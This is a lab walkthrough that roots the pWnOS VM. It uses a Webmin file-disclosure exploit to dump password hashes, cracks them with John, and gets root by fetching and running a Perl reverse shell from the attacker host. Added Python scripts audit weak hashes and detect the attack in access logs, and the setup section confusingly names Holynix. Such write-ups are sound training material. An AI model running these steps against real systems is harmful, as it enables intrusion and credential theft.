- VM: pWnOS
- Goal: acquire root access
- Approach: solve without automated exploitation tools
Network IP address fix for VMware
If the VM does not obtain an IP address automatically, do the following to fix it:
- Reset the root password
- login to Holynix as root
- run command: rm /etc/udev/rules.d/70-persistent-net.rules
- reboot Holynix: shutdown -r 0
After doing this, the VM should obtain an IP address correctly. Note: if you want to keep the original root password, record the root entry in the /etc/shadow file right before changing the root password and put it back after the procedure is completed.
Enumeration
Target Discovery
First, locate the IP address of the target:
nmap -n -sn 192.168.172.200-

Port scanning
nmap -p- -A 192.168.172.214

Port      | Service
TCP 22    | OpenSSH 4.6p1 Debian 5build1
TCP 80    | Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
TCP 139   | Samba smbd 3.X - 4.X (workgroup: MSHOME)
TCP 445   | Samba smbd 3.0.26a (workgroup: MSHOME)
TCP 10000 | MiniServ 0.01 (Webmin httpd)
Check out the website

There isn't much on the website. Following the Next button and filling in some info just gets you some taunting. lol


Check out Webmin site

The webpage shows a login form for Webmin. I try some SQL injection tests, but it isn't vulnerable, so I turn to searchsploit to check for known Webmin vulnerabilities.
searchsploit webmin

There is an Arbitrary File Disclosure exploit that may be helpful. I am trying out 1997.php.
Exploitation
Webmin: Arbitrary File Disclosure
cp /usr/share/exploitdb/exploits/multiple/remote/1997.php .
php -f 1997.php 192.168.172.214 10000 http /etc/passwd

Awesome. I am able to retrieve the file /etc/passwd. Then I try /etc/shadow, which also succeeds, and obtain the following password hashes:
root:$1$y6hGTk5a$1TpAFWhHwn44JOTsIANpk1:18164:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
Password cracking
Let's crack the passwords using John the Ripper:
Step 1: Combine passwd & shadow
I save the passwd and shadow files as pwnos-passwd and pwnos-shadow respectively and use the unshadow command to combine the two:
unshadow pwnos-passwd pwnos-shadow > pwnos-hash
Step 2: Perform a dictionary attack with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt pwnos-hash

We crack the password for user vmware: h4ckm3. We can now log in using SSH.
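The hashes recovered above all start with $1$, i.e. MD5-crypt, a scheme with no tunable work factor, which is a large part of why a rockyou run finishes so quickly. The script below is an added example, not part of the original write-up and not a John or unshadow feature: it parses shadow-format lines and flags accounts whose password field is empty, uses MD5-crypt, or uses traditional DES crypt. The weak/strong classification, the sample entries (constructed, with placeholder hash bodies) and the function names are assumptions of this example.

```python
import re
from typing import Dict, List, NamedTuple

# crypt(3) identifier prefixes and how this example classifies them.
# Assumption of this example: $1$ and DES are "weak" because neither has a
# configurable cost; the strong set is what current distributions emit.
WEAK_SCHEMES = {"$1$": "MD5-crypt"}
STRONG_SCHEMES = {
    "$5$": "SHA-256-crypt",
    "$6$": "SHA-512-crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
    "$2b$": "bcrypt",
}


class ShadowEntry(NamedTuple):
    user: str
    hash: str          # second field of /etc/shadow
    last_change: int   # days since the epoch of the last password change


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow-file content; every line has exactly nine colon-separated fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"line {lineno}: expected 9 fields, got {len(fields)}")
        user, pw_hash, last_change = fields[0], fields[1], fields[2]
        entries.append(ShadowEntry(user, pw_hash, int(last_change or 0)))
    return entries


def classify_hash(pw_hash: str) -> str:
    """Describe the hashing scheme used by one shadow password field."""
    if pw_hash == "":
        return "empty (no password required)"
    if pw_hash.startswith(("!", "*")):
        return "locked"
    m = re.match(r"(\$[^$]+\$)", pw_hash)
    if not m:
        # No $id$ prefix: traditional 13-character DES crypt (8-char limit, 12-bit salt).
        return "traditional DES (weak)"
    scheme = m.group(1)
    if scheme in WEAK_SCHEMES:
        return f"{WEAK_SCHEMES[scheme]} (weak)"
    if scheme in STRONG_SCHEMES:
        return STRONG_SCHEMES[scheme]
    return f"unknown scheme {scheme}"


def audit_shadow(text: str) -> Dict[str, str]:
    """Return user -> verdict for every account that needs attention."""
    problems = {}
    for entry in parse_shadow(text):
        verdict = classify_hash(entry.hash)
        if verdict.endswith("(weak)") or verdict.startswith(("empty", "unknown")):
            problems[entry.user] = verdict
    return problems


# Constructed sample in shadow format; salts and hash bodies are placeholders.
SAMPLE_SHADOW = """\
root:$1$saltsalt$AAAAAAAAAAAAAAAAAAAAA.:18164:0:99999:7:::
vmware:$1$saltsalt$BBBBBBBBBBBBBBBBBBBBB.:14042:0:99999:7:::
admin:$6$constructedsalt$CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:18164:0:99999:7:::
legacy:abCONSTRUCTED:14041:0:99999:7:::
guest::14041:0:99999:7:::
daemon:*:14041:0:99999:7:::
"""

if __name__ == "__main__":
    for user, verdict in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user}: {verdict}")
```

Run against a real shadow file, the same audit tells you which accounts would fall to exactly the dictionary attack shown above; the fix is re-hashing on next login (for example by forcing a password change with `chage -d 0`) once the system's crypt default is SHA-512-crypt or yescrypt.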
SSH Login
ssh -l vmware 192.168.172.214

Privilege Escalation
Webmin is written in Perl, with its scripts served under the .cgi extension. The Webmin exploit we used was abusing an LFI (Local File Inclusion) vulnerability. Typically, when a file with the same script extension as the web server's own scripts (in this case .cgi) is requested, the script is executed and its output is returned instead of the script's actual content.
So we can upload a Perl reverse shell script and use this Webmin exploit again to try to execute it. First get a copy of the Perl reverse shell, update the IP address and port (192.168.172.110:4000), and set up a web server on the Kali box:
cp /usr/share/webshells/perl/perl-reverse-shell.pl rshell.cgi
nano rshell.cgi
python -m SimpleHTTPServer 80
Then download the .cgi file to the target machine:
cd /tmp
wget http://192.168.172.110/rshell.cgi
chmod 755 rshell.cgi
Set up a Netcat listener on the Kali box:
nc -lp 4000
Finally, in another Kali terminal:
php -f 1997.php 192.168.172.214 10000 http /tmp/rshell.cgi

Root access obtained!
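Both the file disclosure and the .cgi execution above leave a trail in the web server's access log. The script below is an added detection example, not part of the original write-up and not a Webmin feature: it scans combined-format access log lines and reports requests that carry a traversal sequence (raw, percent-encoded or double-encoded), reference /etc/passwd or /etc/shadow, or execute a .cgi file from a world-writable directory such as /tmp. The log-format regex, the list of sensitive paths and directories, and the sample log lines (constructed) are all assumptions of this example.

```python
import re
from typing import List, NamedTuple, Optional
from urllib.parse import unquote

# Combined log format as written by Apache and, with logging enabled, by
# Webmin's miniserv. The field layout is an assumption of this example.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# ".." followed by a separator or by any percent-encoded byte: this catches
# encoded separators without hard-coding one particular byte value.
TRAVERSAL_RE = re.compile(r"\.\.(?:/|\\|%[0-9a-fA-F]{2})")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


class Finding(NamedTuple):
    ip: str
    path: str
    status: int
    reasons: List[str]


def decode_path(path: str) -> str:
    """Percent-decode twice so double-encoded sequences normalise as well."""
    return unquote(unquote(path))


def analyse_request(ip: str, raw_path: str, status: int) -> Optional[Finding]:
    """Return a Finding if the request shows any of the three artefacts, else None."""
    reasons = []
    decoded = decode_path(raw_path)
    if TRAVERSAL_RE.search(raw_path) or "../" in decoded:
        reasons.append("path traversal sequence")
    for sensitive in SENSITIVE_FILES:
        if sensitive in decoded:
            reasons.append(f"reference to {sensitive}")
    if decoded.endswith(".cgi") and any(d in decoded for d in WRITABLE_DIRS):
        reasons.append("CGI execution from a world-writable directory")
    if not reasons:
        return None
    return Finding(ip, raw_path, status, reasons)


def scan_log(lines) -> List[Finding]:
    """Run analyse_request over every parsable log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line; skipped, not failed
        finding = analyse_request(m["ip"], m["path"], int(m["status"]))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample: one benign login page request, three requests mirroring
# the write-up's steps (passwd, shadow, then the uploaded .cgi), one unrelated.
SAMPLE_LOG = """\
192.168.172.110 - - [10/Sep/2019:10:01:02 +0000] "GET /session_login.cgi HTTP/1.1" 200 1532
192.168.172.110 - - [10/Sep/2019:10:03:15 +0000] "GET /..%2f..%2f..%2fetc/passwd HTTP/1.0" 200 1421
192.168.172.110 - - [10/Sep/2019:10:03:40 +0000] "GET /%252e%252e/%252e%252e/etc/shadow HTTP/1.0" 200 612
192.168.172.110 - - [10/Sep/2019:10:05:09 +0000] "GET /..%2f..%2f..%2ftmp/rshell.cgi HTTP/1.0" 200 0
10.0.0.5 - - [10/Sep/2019:10:06:00 +0000] "GET /webmin/index.cgi HTTP/1.1" 401 0
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f.ip} {f.status} {f.path}: {', '.join(f.reasons)}")
```

The third sample line is double-encoded on purpose: a single `unquote` would leave `%2e%2e/` in place and miss it, which is why the example decodes twice before matching. A request that both traverses and touches /etc/shadow with a 200 status is the combination worth paging on; the same pattern with a 404 still indicates probing.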